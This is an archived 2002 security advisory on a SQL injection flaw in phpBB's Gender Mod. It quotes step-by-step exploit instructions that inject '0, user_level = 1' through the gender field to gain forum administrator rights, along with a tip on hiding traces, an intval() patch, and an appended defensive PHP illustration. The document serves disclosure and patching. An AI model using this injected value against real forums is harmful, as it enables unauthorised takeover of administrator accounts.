SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   phpBB
Vendors:   phpBB Group
phpBB Bulletin Board 'Gender Mod' Profile Modification Input Validation Flaw Lets Remote Authenticated Users Gain Administrative Privileges on the Bulletin Board
SecurityTracker Alert ID:  1004869
SecurityTracker URL:  http://securitytracker.com/id/1004869
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 28 2002
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 2.x; 1.1.3
Description:   A vulnerability was reported in the phpBB bulletin board software. When used with the 'Gender Mod' modification, a remote authenticated user can gain administrative privileges on the forum.

It is reported that Gender Mod contains an input validation flaw that allows remote authenticated users to inject additional SQL fields into the UPDATE statement that saves the user profile. A remote user can assign the value 'user_level = 1' to gain administrator privileges on the bulletin board.

The following demonstration exploit steps are provided:

1. Save the User Profile page into your disk to modify it offline.

2. Add the correct full post action address (http://forum.victim.com/...):
<FORM action=http://forum.victim.com/profile.php?sid=<current_session_id> method=post encType=multipart/form-data>

3. Modify the HTML form so that the input field "gender" has a value like:
<input type=text name=gender value="0, user_level = 1 ">

4. Load this page in the same browser window where the cookie is still available.

Then, hit 'Submit' to change the user profile.

The vendor has reportedly been notified.

Impact:   A remote authenticated user can gain administrative access on the bulletin board.
Solution:   No solution was available at the time of this entry.

The author of the report has provided an unofficial patch (available in the Source Message).

Vendor URL:  www.phpbb.com/mods/downloads/index.php?t=sub_pages&cat=6
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  phpBB/gender mod allows getting admin privilege, exploit/patch




######################################################################### 
## Announcement:
## Fix for the user-privilege-change bug in phpBB 2.x
## In phpBB with the official Gender Mod, this vuln allows a normal user
## to set her/himself to become a forum administrator.
##
## Written by/Author: PTTrung
## http://hackervn.net (caothuvolam) http://viethacker.net (langtuhaohoa)
## trungonly@yahoo.com
##
## Description:
## Gender Mod is a commonly used modification in official phpBB releases.
## Unchecked posted values can add some SQL fields into the UPDATE sql
## command.
## This affects the newest version 1.1.3.
## If you assign the value: 'user_level = 1', you will have the
## ADMINISTRATOR PRIVILEGE in forum.
##
## Exploit:
## 1. Save the User Profile page into your disk to modify it offline.
## 2. Add the correct full post action address (http://forum.victim.com/...):
##   <FORM action=http://forum.victim.com/profile.php?sid=<current_session_id> method=post
##      encType=multipart/form-data>
## 3. Modify the HTML Form so that the input field "gender" has a value like:
##   <input type=text name=gender value="0, user_level = 1 ">
## 4. Load this page in the same browser window where the cookie is still
## available.
## Take care of all your works to hide the tracking of your hacking and finally hit Submit
## to change the user profile. You're done.
##
## Patch:
## File To Patch: 
## forumroot/includes/usercp_register.php
##
## Note.
## The phpBB team has also been emailed about this problem.
## 
######################################################################### 

# Patch
#
#-----[ OPEN ]------------------------------------------ 
# 
    forumroot/includes/usercp_register.php

# 
#-----[ FIND ]------------------------------------------ 
# 

	$gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS['gender'] : 0;

# 
#-----[ REPLACE AS ]------------------------------------ 
# 

	$gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval($HTTP_POST_VARS['gender']) : 0;

# 
#-----[ SAVE/CLOSE/UPLOAD THIS FILE ]------------------- 
# 
# EoP 
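The following PHP is an added illustration, not code from the advisory or from phpBB: it reconstructs how an unchecked 'gender' value is carried into the UPDATE statement, shows why the patch's intval() call stops it, and adds a simple check a reviewer or query-log monitor could apply. The function names, the `$post` array standing in for `$HTTP_POST_VARS`, and the table and column names are assumptions chosen to mirror the report.

```php
<?php
// Added example (not phpBB code): reconstructs the bug class the report
// describes. Table and column names are assumptions, not taken from phpBB.

// Vulnerable pattern: the posted value is interpolated into the SET list
// unchanged, so a value such as "0, user_level = 1" appends a second
// assignment to the UPDATE statement.
function build_profile_update_vulnerable(array $post, int $user_id): string
{
    $gender = isset($post['gender']) ? $post['gender'] : 0;
    return "UPDATE phpbb_users SET user_gender = $gender WHERE user_id = $user_id";
}

// Patched pattern (the report's fix): intval() keeps only the leading
// integer, so anything appended after it is discarded before use.
function build_profile_update_fixed(array $post, int $user_id): string
{
    $gender = isset($post['gender']) ? intval($post['gender']) : 0;
    return "UPDATE phpbb_users SET user_gender = $gender WHERE user_id = $user_id";
}

// Defensive check for a query log or code review: a gender update must
// assign exactly one column and must never touch user_level.
function update_touches_privilege(string $sql): bool
{
    if (!preg_match('/\bSET\b(.*?)\bWHERE\b/i', $sql, $m)) {
        return false;
    }
    $assignments = array_map('trim', explode(',', $m[1]));
    foreach ($assignments as $a) {
        if (preg_match('/^user_level\s*=/i', $a)) {
            return true;
        }
    }
    return count($assignments) !== 1;
}

// Constructed sample input carrying the payload quoted in the advisory.
$post = ['gender' => '0, user_level = 1 '];

$bad  = build_profile_update_vulnerable($post, 42);
$good = build_profile_update_fixed($post, 42);

echo "vulnerable: $bad\n";
echo "fixed:      $good\n";
echo "vulnerable touches user_level: ", update_touches_privilege($bad) ? 'yes' : 'no', "\n";
echo "fixed touches user_level:      ", update_touches_privilege($good) ? 'yes' : 'no', "\n";
```

Running it shows the vulnerable query carrying two assignments while the patched query carries only `user_gender = 0`, which is the whole effect of the one-line fix above.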
